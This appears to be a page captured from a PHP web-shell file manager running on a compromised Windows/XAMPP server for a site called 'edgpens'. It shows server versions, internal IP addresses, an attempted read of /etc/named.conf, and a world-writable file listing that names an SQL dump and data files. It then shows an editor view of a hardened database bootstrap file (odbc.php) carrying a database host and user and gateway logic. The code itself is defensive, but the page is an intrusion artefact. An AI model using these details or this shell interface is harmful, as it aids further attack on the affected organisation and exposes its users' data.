Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
C: /
xampp7 /
htdocs /
edgpens /
Name
Size
Permission
Action
backup
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
dashboard
[ DIR ]
drwxrwxrwx
edg
[ DIR ]
drwxrwxrwx
extension
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
inc
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
kod
[ DIR ]
drwxrwxrwx
patch
[ DIR ]
drwxrwxrwx
pdf
[ DIR ]
drwxrwxrwx
reports
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwxrwx
utility
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.htaccess.backup
1.24
KB
-rw-rw-rw-
!test.php
17
B
-rw-rw-rw-
MalaysiaBooks.php
3.67
KB
-rw-rw-rw-
Nota14102020.docx
22.8
KB
-rw-rw-rw-
access.php
268
B
-rw-rw-rw-
access2.php
245
B
-rw-rw-rw-
account_recovery.php
8.4
KB
-rw-rw-rw-
account_recovery_test.php
6.3
KB
-rw-rw-rw-
ajax.php
4.02
KB
-rw-rw-rw-
banner.php
73.61
KB
-rw-rw-rw-
company_search.php
8.38
KB
-rw-rw-rw-
composer.json
1.5
KB
-rw-rw-rw-
composer.lock
173.77
KB
-rw-rw-rw-
ctype.txt
266
B
-rw-rw-rw-
custom.css
3.7
KB
-rw-rw-rw-
custom.js
9.88
KB
-rw-rw-rw-
custom200630.js
6.46
KB
-rw-rw-rw-
custom_200630.css
1.04
KB
-rw-rw-rw-
custom_200705.js
6.82
KB
-rw-rw-rw-
dashboard.php
5.71
KB
-rw-rw-rw-
dashboard_old.php
51
B
-rw-rw-rw-
dbedgpens.sql
3.85
MB
-rw-rw-rw-
dglist.php
3.97
KB
-rw-rw-rw-
dgweb-dg.txt
2.65
MB
-rw-rw-rw-
dgweb.xls
297.5
KB
-rw-rw-rw-
err_404.php
75
B
-rw-rw-rw-
f_declaration.php
515
B
-rw-rw-rw-
frame.php
1.46
KB
-rw-rw-rw-
gip.php
1.51
KB
-rw-rw-rw-
gip1.php
7
B
-rw-rw-rw-
imp_data.php
2.03
KB
-rw-rw-rw-
index_footer.php
138
B
-rw-rw-rw-
index_head.php
663
B
-rw-rw-rw-
index_search.php
667
B
-rw-rw-rw-
ins_composer.php
417
B
-rw-rw-rw-
ktn-pens-companies.txt
330.12
KB
-rw-rw-rw-
ktn-pens-port.txt
602.81
KB
-rw-rw-rw-
ktn-pens-vessel.txt
6.12
MB
-rw-rw-rw-
ktn-pens-vtype.txt
353
B
-rw-rw-rw-
login.php
12.14
KB
-rw-rw-rw-
login_200704.php
9.81
KB
-rw-rw-rw-
main.php
644
B
-rw-rw-rw-
nota.txt
120
B
-rw-rw-rw-
odbc.php
24.03
KB
-rw-rw-rw-
odbc_test.php
15.24
KB
-rw-rw-rw-
readtext.php
7.99
KB
-rw-rw-rw-
recover_msg.php
806
B
-rw-rw-rw-
registration.php
27.31
KB
-rw-rw-rw-
registration_2.php
12.94
KB
-rw-rw-rw-
registration_submit.php
6.85
KB
-rw-rw-rw-
reset_password.php
9.55
KB
-rw-rw-rw-
self_register.php
14.58
KB
-rw-rw-rw-
self_register_230312.php
14.57
KB
-rw-rw-rw-
sessions.php
2.78
KB
-rw-rw-rw-
sessions_200705.php
1.4
KB
-rw-rw-rw-
sessions_200721.php
1.75
KB
-rw-rw-rw-
test.php
11.8
KB
-rw-rw-rw-
test_sess.php
1.35
KB
-rw-rw-rw-
testedg.txt
7
B
-rw-rw-rw-
testing.txt
7
B
-rw-rw-rw-
testinput.php
6.7
KB
-rw-rw-rw-
testx.php
4
B
-rw-rw-rw-
user.php
160.56
KB
-r--r--r--
vessel.txt
498.07
KB
-rw-rw-rw-
vessel2.txt
249.04
KB
-rw-rw-rw-
zzz
11
B
-rw-rw-rw-
zzz.txt
249.04
KB
-rw-rw-rw-
~$ta14102020.docx
162
B
-rw-rw-rw-
~WRL0738.tmp
23.29
KB
-rw-rw-rw-
Code Editor : odbc.php
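<?php
/**
 * Shared bootstrap: opens the MySQL connections, loads site configuration into
 * globals, and defines the session / login / audit / upload helpers used by the
 * rest of the application.
 *
 * Review summary of what changed relative to the previous revision:
 *  - the database password is no longer a literal in this file;
 *  - every query that interpolated a caller-supplied value now binds it;
 *  - eval() is no longer used to bind statement parameters;
 *  - session tokens come from a CSPRNG instead of mt_rand() seeded with time();
 *  - password hashes are compared in constant time, not with loose ==;
 *  - growl_me() encodes the message for a JavaScript context;
 *  - checkupload() actually consults the MIME allow-list;
 *  - database error text is logged server-side instead of echoed to the client.
 */
error_reporting(1);
date_default_timezone_set('Asia/Kuala_Lumpur');

// NOTE(review): the database password used to be embedded here. Any value that
// was ever committed or served from this file must be treated as disclosed and
// rotated. The environment variable names below are introduced by this change;
// host, user and schema keep their previous values as defaults.
$db_host = getenv('EDGPENS_DB_HOST') ?: "172.16.0.67";
$db_user = getenv('EDGPENS_DB_USER') ?: "edgpens";
$db_name = getenv('EDGPENS_DB_NAME') ?: "edgpens";
$db_pass = getenv('EDGPENS_DB_PASSWORD');
if ($db_pass === false || $db_pass === '') {
    // Fail closed: never fall back to a built-in credential.
    error_log("odbc.php: EDGPENS_DB_PASSWORD is not set");
    echo "Failed to connect to MySQL.";
    exit();
}

$GLOBALS['mysqli'] = new mysqli($db_host, $db_user, $db_pass, $db_name);
$mysqli = $GLOBALS['mysqli'];
if ($mysqli->connect_errno) {
    // The previous code read $mysqli_link here, before it was created.
    error_log("odbc.php: MySQL connect failed (" . $mysqli->connect_errno . ") " . $mysqli->connect_error);
    echo "Failed to connect to MySQL.";
    exit();
}

// Second handle with the same parameters; kept because other files may use it.
$mysqli_link = new mysqli($db_host, $db_user, $db_pass, $db_name);
if ($mysqli_link->connect_errno) {
    error_log("odbc.php: MySQL connect failed (" . $mysqli_link->connect_errno . ") " . $mysqli_link->connect_error);
    echo "Failed to connect to MySQL.";
}
unset($db_pass);

$svr_http = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on' ? "https://" : "http://";
$svr_port = isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '80' ? "" : ":".$_SERVER['SERVER_PORT'];

// Site configuration joined with the SMS gateway account.
$stmt = $mysqli->stmt_init();
$stmt->prepare("SELECT a.*, b.username sms_username, b.password sms_password, b.sendid sms_sendid FROM utiliti_web_config a CROSS JOIN utiliti_sms b");
$stmt->execute();
$result = $stmt->get_result();
$stmt->close();
$aa = $result->fetch_assoc();

$GLOBALS['conf_fullname']      = $aa['fullname'];
$GLOBALS['conf_shortname']     = $aa['shortname'];
$GLOBALS['conf_maxuploadsize'] = $aa['maxuploadsize'];
$GLOBALS['conf_weblink']       = $aa['weblink'];
// NOTE(review): SERVER_NAME can follow the request's Host header depending on
// the web server configuration; confirm before using this value in e-mailed links.
$GLOBALS['conf_fullweblink']   = (substr($aa['weblink'],0,4)=="http")
    ? $aa['weblink']
    : $svr_http.$_SERVER["SERVER_NAME"].$svr_port.$aa['weblink'];
$GLOBALS['conf_log_attempt']   = $aa['log_attempt'];
$GLOBALS['conf_sess_timeout']  = $aa['sess_timeout'];
$GLOBALS['conf_pass_min']      = $aa['pass_min'];
$GLOBALS['conf_pass_max']      = $aa['pass_max'];
$GLOBALS['conf_pass_digit']    = ($aa['pass_digit']==1)  ? 'true' : 'false';
$GLOBALS['conf_pass_symbol']   = ($aa['pass_symbol']==1) ? 'true' : 'false';
$GLOBALS['conf_pass_upcase']   = ($aa['pass_upcase']==1) ? 'true' : 'false';
$GLOBALS['conf_pass_locase']   = ($aa['pass_locase']==1) ? 'true' : 'false';
$GLOBALS['conf_pass_expired']  = $aa['pass_expired'];
$GLOBALS['conf_pass_text']     = $aa['pass_text'];
$GLOBALS['conf_sms_username']  = $aa['sms_username'];
$GLOBALS['conf_sms_password']  = $aa['sms_password'];
$GLOBALS['conf_sms_sendid']    = $aa['sms_sendid'];
unset($result);
unset($aa);

// Active document types: extension lists in several formats plus an
// extension => MIME map that checkupload() uses as its allow-list.
$stmt = $mysqli->stmt_init();
$stmt->prepare("SELECT * FROM kod_doctype WHERE flagAktif='Y'");
$stmt->execute();
$result = $stmt->get_result();
$stmt->close();
$conf_doctype1 = array();
$conf_doctype2 = "";
$conf_doctype3 = "";
$conf_doctype4 = array();
$GLOBALS['conf_doctype5'] = array();
while($aa = $result->fetch_assoc()){
    array_push($conf_doctype1, $aa['doctype']);
    $conf_doctype2 .= ' .'.$aa['doctype'].',';
    $conf_doctype3 .= ' *.'.$aa['doctype'].',';
    array_push($conf_doctype4, '.'.$aa['doctype']);
    // Written through $GLOBALS so the map exists even if this file is included
    // from inside a function.
    $GLOBALS['conf_doctype5'][$aa['doctype']] = $aa['mime'];
}
$conf_doctype2 = substr($conf_doctype2,1,-1);
$conf_doctype3 = substr($conf_doctype3,1,-1);
unset($result);
unset($aa);

//----------------------------------------------------------------------------------
// Internal helpers (added): prepared-statement plumbing shared by the functions below.
//----------------------------------------------------------------------------------

/**
 * Prepare $sql, bind $params positionally and execute.
 *
 * @param string $sql    Statement text with ? placeholders.
 * @param string $types  mysqli type string; "" when there is nothing to bind.
 * @param array  $params Values to bind, in placeholder order.
 * @return mysqli_stmt|false Executed statement (caller closes it) or false on
 *                           failure; the error is logged, never echoed.
 */
function edg_stmt_execute($sql, $types = "", array $params = array()){
    global $mysqli;
    $stmt = $mysqli->stmt_init();
    if (!$stmt->prepare($sql)) {
        error_log("odbc.php: prepare failed: " . $mysqli->error);
        return false;
    }
    if ($types !== "") {
        // array_values(): string keys cannot be unpacked on PHP 7.
        $values = array_values($params);
        $stmt->bind_param($types, ...$values);
    }
    if (!$stmt->execute()) {
        error_log("odbc.php: execute failed: " . $stmt->error);
        $stmt->close();
        return false;
    }
    return $stmt;
}

/**
 * Run a SELECT through edg_stmt_execute() and return its first row.
 *
 * @return array|null Associative row, or null when there is no row or the query failed.
 */
function edg_fetch_row($sql, $types = "", array $params = array()){
    $stmt = edg_stmt_execute($sql, $types, $params);
    if ($stmt === false) {
        return null;
    }
    $result = $stmt->get_result();
    $stmt->close();
    return $result ? $result->fetch_assoc() : null;
}

/**
 * Resolve the bind type string: the caller's string when its length matches the
 * parameter count, otherwise (or for 'auto') one "s" per parameter.
 */
function edg_bind_types($param_type, array $param_data){
    $type_auto = str_repeat("s", count($param_data));
    if (strlen($param_type) != count($param_data) || $param_type == 'auto') {
        return $type_auto;
    }
    return $param_type;
}

/**
 * Build the audit text: the SQL, then one $name="value" entry per parameter,
 * separated by ",\n" (same layout the audit trail already stores).
 */
function edg_audit_text($sql, array $param_data){
    $entries = array();
    foreach ($param_data as $name => $value) {
        $entries[] = "\${$name}=\"{$value}\"";
    }
    return $sql.";\n".implode(",\n", $entries);
}

//----------------------------------------------------------------------------------
// Delete a session and return.
//----------------------------------------------------------------------------------
function deleteSession($session){
    // The token is bound, not interpolated: it originates from the client.
    $stmt = edg_stmt_execute("DELETE FROM utiliti_session WHERE session = ?", "s", array($session));
    if ($stmt) {
        $stmt->close();
    }
    return;
}

//----------------------------------------------------------------------------------
// Update session time if it exists.
// Returns the session token, or false when the session is unknown or expired.
//----------------------------------------------------------------------------------
function updateSession($session){
    checkSession(); // purge expired sessions first
    $row = edg_fetch_row("SELECT * FROM utiliti_session WHERE session=?", "s", array($session));
    if($row){
        $stmt = edg_stmt_execute(
            "update utiliti_session set masa=? where session=?",
            "ss",
            array(date('Y-m-d H:i:s'), $session)
        );
        if ($stmt === false) {
            // The statement text is no longer echoed to the client.
            echo "Fail to updating the session";
        } else {
            $stmt->close();
        }
    }else{
        $session = false;
    }
    return $session;
}

//----------------------------------------------------------------------------------
// Log user in. If user already has a session then security risk. Throw them out.
//
// Returns an array: [0] message for the user, [1] session token or false,
// [3] 0 on success / 1 on failure (index 2 is not used).
//----------------------------------------------------------------------------------
function login($passedusername,$passedpassword){
    global $conf_log_attempt;
    checkSession();

    // NOTE(review): stored passwords are unsalted MD5. Replacing this needs a
    // coordinated change wherever passwordUser is written (registration, reset),
    // e.g. password_hash()/password_verify() with re-hash on next login.
    $passedpassword = md5($passedpassword);

    $usertype = 1;
    $row = edg_fetch_row("SELECT * FROM user_list WHERE emailUser=?", "s", array($passedusername));
    if(!$row){
        // For users who are not in user_list yet.
        $row = edg_fetch_row(
            "SELECT * FROM user_register WHERE emailUser=? AND flagUser=2 AND status=1",
            "s",
            array($passedusername)
        );
        $usertype = 2;
    }

    $session   = array();
    $idUser    = $row ? $row['idUser'] : null;
    $user_type = $usertype;

    // Today's failed-attempt counter for this account, if any.
    $ulogin = edg_fetch_row(
        "SELECT * FROM utiliti_login WHERE idUser=? AND user_type=? AND attempt_date=CURDATE()",
        "ss",
        array($idUser, $user_type)
    );
    $uid  = $ulogin ? $ulogin['id'] : 0;
    $ucnt = $ulogin ? $ulogin['attempt_count'] : 0;

    $locked_msg = ($usertype==2)
        ? "Too Many Attempts. Account Locked For Today! <hr>You Can Try Unlock It With <br>Forgot Password"
        : "Too Many Attempts. Account Locked For Today! <hr>You Can Try Unlock It With <br>Forgot Password / Contact The Admins";

    if($ucnt >= $conf_log_attempt){
        $session[0] = $locked_msg;
        $session[1] = false;
        $session[3] = 1;
        return $session;
    }

    if(!$row){
        // NOTE(review): this reply differs from the wrong-password reply, so the
        // form reveals whether an address is registered; unknown addresses are
        // also not rate-limited by the per-account counter.
        $session[0] = "Please Try Again!";
        $session[1] = false;
        $session[3] = 1;
        return $session;
    }

    $userid   = $row['idUser'];
    $nama     = strtoupper($row['nameUser']);
    $password = $row['passwordUser'];
    $flagUser = ($usertype==2) ? 1 : $row['flagUser'];
    // The date_start / date_end validity window on the user row is not enforced;
    // that check was already disabled in the previous revision.

    // hash_equals(): constant-time, and avoids loose == treating two different
    // numeric-looking hex digests as equal.
    if(hash_equals((string)$password, $passedpassword)){
        if($flagUser == 3){
            $session[0] = "Ops! Something Wrong.<br>Please Contact System Administrators.";
            $session[1] = false;
            $session[3] = 1;
        }else if($flagUser == 2){
            $session[0] = "Ops! Your Login Have Been Blocked.<br>Please Contact System Administrators.";
            $session[1] = false;
            $session[3] = 1;
        }else{
            // OK to proceed.
            log_attempts($idUser,$user_type,2,$uid); // clear count for today
            $session[0] = "Welcome Back. {$nama}";
            $session[1] = checkUser($userid,$usertype); // already logged in?
            $session[3] = 0;
            if ($session[1]){
                deleteSession($session[1]); // force the existing session out
            }
            $session[1] = setSession($userid,$usertype);
        }
    }else{
        log_attempts($idUser,$user_type,1,$uid);
        $ucntreal = $conf_log_attempt-($ucnt+1);
        if($ucntreal==0){
            $session[0] = $locked_msg;
        }else{
            $session[0] = "Please Try Again! <hr>You Got <b>{$ucntreal}</b> More Attempt/s Left Before The Account Get Locked.";
        }
        $session[1] = false;
        $session[3] = 1;
    }
    return $session;
}

/**
 * Maintain the per-day failed-login counter in utiliti_login.
 *
 * @param mixed $iduser        Account id.
 * @param mixed $usertype      1 = user_list account, 2 = user_register account (as set by login()).
 * @param int   $log_type      1 = record a failed attempt; anything else = reset the counter.
 * @param mixed $uid           utiliti_login.id of today's row, or empty when unknown.
 * @param mixed $unlock_iduser When non-zero, recorded as the account that performed the unlock.
 */
function log_attempts($iduser,$usertype,$log_type,$uid = 0,$unlock_iduser = 0){
    if($log_type==1){ // failed attempt
        if(!empty($uid)){
            $sql    = "UPDATE utiliti_login SET attempt_count=attempt_count+1 WHERE id=?";
            $types  = "s";
            $params = array($uid);
        }else{
            $sql    = "INSERT INTO utiliti_login (idUser,user_type,attempt_date,attempt_count) VALUES (?,?,NOW(),1) ";
            $types  = "ss";
            $params = array($iduser, $usertype);
        }
    }else{ // reset / unlock
        if(!empty($uid)){
            $sql    = "UPDATE utiliti_login SET attempt_count=0 WHERE id=?";
            $types  = "s";
            $params = array($uid);
        }else if($unlock_iduser==0){
            $sql    = "UPDATE utiliti_login SET attempt_count=0 WHERE idUser=? AND user_type=? AND attempt_date=CURDATE() ";
            $types  = "ss";
            $params = array($iduser, $usertype);
        }else{
            $sql    = "UPDATE utiliti_login SET attempt_count=0, unlock_idUser=?, unlock_date=CURDATE() WHERE idUser=? AND user_type=? AND attempt_date=CURDATE() ";
            $types  = "sss";
            $params = array($unlock_iduser, $iduser, $usertype);
        }
    }
    $stmt = edg_stmt_execute($sql, $types, $params);
    if ($stmt) {
        $stmt->close();
    }
}

//----------------------------------------------------------------------------------
// Set a session and insert session into session table.
// Returns the new token: the user id followed by 80 random alphanumerics.
//----------------------------------------------------------------------------------
function setSession($userid,$usertype){
    $length        = 80; // number of random characters in the token
    $sessionstring = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    $achar         = strlen($sessionstring)-1;

    // random_int() draws from the OS CSPRNG. The previous mt_srand(time()) +
    // mt_rand() made the token a function of the login second.
    $session = "";
    for ($i=0;$i<$length;$i++){
        $session .= $sessionstring[random_int(0,$achar)];
    }
    $session = $userid.$session;

    // assumes utiliti_session.masa is a DATETIME/TIMESTAMP column — TODO confirm
    $stmt = edg_stmt_execute(
        "INSERT INTO utiliti_session (session,idUser,masa,usertype) VALUES (?,?,?,?)",
        "sssi",
        array($session, $userid, date('Y-m-d H:i:s'), $usertype)
    );
    if ($stmt === false) {
        die("Unable to create session.");
    }
    $stmt->close();
    return $session;
}

//--------------------------------------------------------------------------------
// Check the user to see if they are already logged in.
// Returns the existing session token, or false.
//--------------------------------------------------------------------------------
function checkUser($userid,$usertype){
    $row = edg_fetch_row(
        "SELECT * FROM utiliti_session WHERE idUser = ? AND usertype = ?",
        "ss",
        array($userid, $usertype)
    );
    return $row ? $row['session'] : false;
}

//----------------------------------------------------------------------------------
// Log the user out when they click on the log-out button.
// Returns true when the session existed and was removed, false otherwise.
//----------------------------------------------------------------------------------
function logout($session){
    $row = edg_fetch_row("SELECT * FROM utiliti_session WHERE session = ?", "s", array($session));
    if (!$row){
        return false;
    }
    deleteSession($session);
    return true;
}

//----------------------------------------------------------------------------------
// Check session and return: removes every session idle longer than
// $conf_sess_timeout minutes.
//----------------------------------------------------------------------------------
function checkSession(){
    global $conf_sess_timeout;
    $expirationtime = time()-($conf_sess_timeout*60);
    // One set-based DELETE replaces the previous select-then-delete-per-row loop.
    $stmt = edg_stmt_execute(
        "DELETE FROM utiliti_session WHERE masa < ?",
        "s",
        array(date('Y-m-d H:i:s', $expirationtime))
    );
    if ($stmt === false) {
        die("Session check failed.");
    }
    $stmt->close();
    return;
}

/**
 * Emit the client-side notification for a stored message.
 *
 * @param array|null $sess  Array carrying 'success_msg'.
 * @param mixed      $g_scc Notification type; only 1, 2 and 3 produce output.
 */
function growl_me($sess = null,$g_scc){
    $msg = (!empty($sess)) ? $sess['success_msg'] : "";
    if (!in_array($g_scc, array(1, 2, 3)) || empty($sess['success_msg'])) {
        return;
    }
    $type = (int)$g_scc;
    // Messages can contain user data (e.g. the account name), so the value is
    // encoded as a JavaScript string literal; the JSON_HEX_* flags also keep
    // "</script>" from terminating the block. Markup such as <br> still reaches
    // $.testme unchanged once the browser decodes the literal.
    $js_msg = json_encode(
        (string)$msg,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE
    );
    if ($js_msg === false) {
        return;
    }
    echo "<script>$(document).ready(function(){ $.testme({$type},{$js_msg}); });</script>";
}

/**
 * Return the utiliti_session row for a session token, or null.
 */
function get_user($sess){
    return edg_fetch_row("SELECT * FROM utiliti_session WHERE session=?", "s", array($sess));
}

/**
 * Return the full account row behind a session token.
 *
 * usertype 1 reads user_list and adds pass_exp ('Y' once datePassword plus
 * pass_expired days has passed) and registered='Y'; any other usertype reads
 * user_register with pass_exp='N' and registered='N'.
 *
 * @return array|null
 */
function get_user_full($sess){
    $row = edg_fetch_row("SELECT * FROM utiliti_session WHERE session=?", "s", array($sess));
    $idUser = $row ? $row['idUser'] : '';
    if($row && $row['usertype']==1){
        $query = "SELECT a.*, if(DATE_FORMAT(NOW(),'%Y-%m-%d') >= DATE_FORMAT(date_add(a.datePassword, INTERVAL b.pass_expired day),'%Y-%m-%d'),'Y','N') pass_exp, 'Y' registered FROM user_list a cross join utiliti_web_config b WHERE a.idUser=?";
    }else{
        $query = "SELECT a.*, 'N' pass_exp, 'N' registered FROM user_register a cross join utiliti_web_config b WHERE a.idUser=?";
    }
    return edg_fetch_row($query, "s", array($idUser));
}

/**
 * Hamdi : 2020-03-20
 * This Function Only for Insert/Update/Delete use.
 *
 * Runs a prepared statement and records it in the audit trail.
 *
 * @param string $sql        Statement with ? placeholders.
 * @param string $param_type mysqli type string, or 'auto' for all strings.
 * @param array  $param_data name => value, in placeholder order.
 * @param mixed  $param_do   Description stored with the audit entry.
 * @param mixed  $query_type Unused; kept for existing callers.
 * @return array [0] => insert id on success; empty array on failure.
 */
function mysqli_prepare_audit($sql,$param_type,$param_data,$param_do = null,$query_type = null){
    global $mysqli;
    $data = array();
    $stmt = $mysqli->stmt_init();
    if (!$stmt->prepare($sql)) {
        error_log("odbc.php: prepare failed: " . $mysqli->error);
        echo 'error executing statement';
        return $data;
    }

    // Values are bound directly. The previous code built a PHP source string
    // from the values and eval()'d it, which let a parameter value be
    // interpreted as code.
    $values = array_values($param_data);
    if ($values) {
        $stmt->bind_param(edg_bind_types($param_type, $param_data), ...$values);
    }

    if (!$stmt->execute()) {
        error_log("odbc.php: execute failed: " . $stmt->error);
        echo 'error executing statement';
        $stmt->close();
    }else{
        $data[0] = $mysqli->insert_id;
        $stmt->close();
        // NOTE(review): the audit text contains the bound values in clear;
        // confirm no caller passes passwords or other secrets through here.
        audit_insert(edg_audit_text($sql, $param_data),$param_do);
    }
    return $data;
}

/**
 * Hamdi : 2020-12-07
 * This Function for All Query.
 *
 * Runs a prepared statement and returns its result set. Raises E_USER_ERROR
 * when prepare, execute or get_result fails.
 *
 * @param string $sql        Statement with ? placeholders.
 * @param string $param_type mysqli type string, or 'auto' for all strings.
 * @param array  $param_data name => value, in placeholder order.
 * @return mysqli_result
 */
function mysqli_prepare_all($sql,$param_type,$param_data){
    global $mysqli;
    $stmt = $mysqli->stmt_init();
    $stmt->prepare($sql) or trigger_error($mysqli->error, E_USER_ERROR);

    // Bound directly instead of through eval(); see mysqli_prepare_audit().
    $values = array_values($param_data);
    if ($values) {
        $stmt->bind_param(edg_bind_types($param_type, $param_data), ...$values);
    }

    $stmt->execute() or trigger_error($stmt->error, E_USER_ERROR);
    ($result = $stmt->get_result()) or trigger_error($stmt->error, E_USER_ERROR);
    $stmt->close();
    return $result;
}

/**
 * Append one row to audit_trail for the current session's user.
 *
 * @param string      $running_sql Statement text plus parameter values.
 * @param string|null $descr       Free-text description; stored as '' when empty.
 */
function audit_insert($running_sql,$descr = null){
    global $mysqli;
    $user = !empty($_SESSION['session']) ? get_user_full($_SESSION['session']) : null;
    if (!is_array($user)) {
        $user = array(); // no session, or the session no longer maps to an account
    }

    $iduser     = isset($user['idUser']) ? $user['idUser'] : '';
    $idRoles    = isset($user['idRoles']) ? $user['idRoles'] : '';
    $registered = isset($user['registered']) ? $user['registered'] : '';
    $idSubRoles = ($registered == 'Y' && isset($user['idSubRoles'])) ? $user['idSubRoles'] : 0;
    $ipaddress  = get_ipclient();
    $descr      = (empty($descr)) ? '' : $descr;

    $stmt = $mysqli->stmt_init();
    $stmt->prepare("insert into audit_trail (idUser,running_sql,descr,ipaddress,idRoles,idSubRoles,register_user) values (?,?,?,?,?,?,?)");
    $stmt->bind_param("sssssss",$iduser,$running_sql,$descr,$ipaddress,$idRoles,$idSubRoles,$registered);
    $stmt->execute();
    $stmt->close();
}

/**
 * Reorder a dash-separated date by reversing its three parts.
 *
 * NOTE(review): presumably converts dd-mm-yyyy to yyyy-mm-dd for MySQL —
 * confirm with callers. The previous body discarded the explode() result and
 * indexed single characters of the input string.
 *
 * @return string The reordered date, or the input unchanged when it does not
 *                have exactly three parts.
 */
function mysql_date($date){
    $parts = explode('-', $date);
    if (count($parts) !== 3) {
        return $date;
    }
    return $parts[2]."-".$parts[1]."-".$parts[0];
}

/**
 * Best-effort client address for the audit trail.
 *
 * NOTE(review): Client-IP and X-Forwarded-For are request headers and can be
 * set by the client. They are kept for compatibility with a reverse-proxy
 * deployment, but should only be honoured when the request arrives from a
 * trusted proxy. The value is now validated as an IP address so arbitrary
 * text cannot be written to audit_trail.ipaddress.
 */
function get_ipclient(){
    if(!empty($_SERVER['HTTP_CLIENT_IP'])) {
        $raw = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $raw = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $raw = '';
    }
    // X-Forwarded-For may hold a comma-separated chain; only the first entry is considered.
    $pieces = explode(',', $raw);
    $first  = trim($pieces[0]);
    if ($first !== '' && filter_var($first, FILTER_VALIDATE_IP) !== false) {
        return $first;
    }
    return isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
}

/**
 * Debug helper: prints the row count and the first user_list row for $id.
 *
 * NOTE(review): this dumps a full account row (including passwordUser) to the
 * response; it should not be reachable in production.
 */
function test_loop($id){
    $sql = "SELECT * FROM user_list WHERE idUser=? ";
    $param_data = array(
        "idUser" => $id
    );
    $result = mysqli_prepare_all($sql,"auto",$param_data);
    echo $result->num_rows;
    print_r($result->fetch_assoc());
}

/**
 * Send an SMS through the iSMS HTTP API.
 *
 * [2019-05-23] iSMS username and password changed (iSMS API change): the
 * account now comes from utiliti_sms via the conf_sms_* globals.
 *
 * @param string $link  Request URL prepared by the caller; everything from
 *                      "http:" up to "&dstno" is replaced with the gateway
 *                      endpoint and the account credentials.
 * @param mixed  $again Non-empty on the retry, which uses plain HTTP.
 * @return string "SMS Telah Berjaya Dihantar" on success, otherwise the
 *                gateway's raw reply.
 */
function ismscURL($link,$again = null){ // hamdi
    global $conf_sms_username, $conf_sms_password, $conf_sms_sendid;
    $username = urlencode($conf_sms_username);
    $password = urlencode($conf_sms_password);
    $link_old = $link;
    $search   = "/(http:)(.*)(&dstno)/";

    // NOTE(review): the retry sends the gateway username and password in the
    // query string over plain HTTP. If the HTTPS attempt fails because the
    // server has no CA bundle configured for cURL, fix that instead and remove
    // the cleartext retry.
    if(!empty($again))
        $replace = "http://www.isms.com.my/isms_send.php?un=$username&pwd=$password&dstno";
    else
        $replace = "https://www.isms.com.my/isms_send.php?un=$username&pwd=$password&dstno";
    $link  = preg_replace($search,$replace,$link);
    $link .= "&type=1&sendid={$conf_sms_sendid}&agreedterm=YES";

    $http = curl_init($link);
    curl_setopt($http, CURLOPT_RETURNTRANSFER, TRUE);
    $http_result = curl_exec($http);
    curl_close($http);

    if($http_result == "2000 = SUCCESS"){
        $http_result = "SMS Telah Berjaya Dihantar";
    }
    else{
        if(empty($again)){
            // Return the retry's outcome; it was previously discarded, so a
            // successful retry was still reported as a failure.
            $http_result = ismscURL($link_old,"http");
        }
    }
    return $http_result;
}

/**
 * Validate one entry of $_FILES.
 *
 * @param array $files A single-file $_FILES element.
 * @return string "" when the upload is acceptable, otherwise the reason.
 */
function checkupload($files){
    $conf_maxuploadsize = $GLOBALS['conf_maxuploadsize'];
    // The allow-list lives in $GLOBALS; the previous code read an undefined
    // local $conf_doctype5, so the MIME check below never rejected anything.
    $allowed_mime = (isset($GLOBALS['conf_doctype5']) && is_array($GLOBALS['conf_doctype5']))
        ? $GLOBALS['conf_doctype5']
        : array();
    try {
        // Undefined | Multiple Files | $_FILES Corruption Attack
        // If this request falls under any of them, treat it invalid.
        if( !isset($files['error']) || is_array($files['error']) ){
            throw new RuntimeException('Invalid parameters.');
        }

        // Check the upload error code.
        switch ($files['error']) {
            case UPLOAD_ERR_OK:
                break;
            case UPLOAD_ERR_NO_FILE:
                throw new RuntimeException('No file sent.');
            case UPLOAD_ERR_INI_SIZE:
            case UPLOAD_ERR_FORM_SIZE:
                throw new RuntimeException('Exceeded filesize limit.');
            default:
                throw new RuntimeException('Unknown errors.');
        }

        // Size in MB, one decimal, compared with the configured maximum.
        $filesize = round($files['size'] / 1024 / 1024, 1);
        if ($filesize > $conf_maxuploadsize) {
            throw new RuntimeException('Exceeded filesize limit.');
        }

        // Do not trust the client-supplied type; sniff the content instead.
        $finfo = new finfo(FILEINFO_MIME_TYPE);
        $ext = array_search($finfo->file($files['tmp_name']), $allowed_mime, true);
        if (false === $ext) {
            throw new RuntimeException('Invalid file format.');
        }
        // NOTE(review): the stored file name/extension is chosen by the caller;
        // confirm it is derived from the allow-list and that the upload
        // directory cannot execute PHP.
        return "";
    }catch (RuntimeException $e) {
        return $e->getMessage();
    }
}
?>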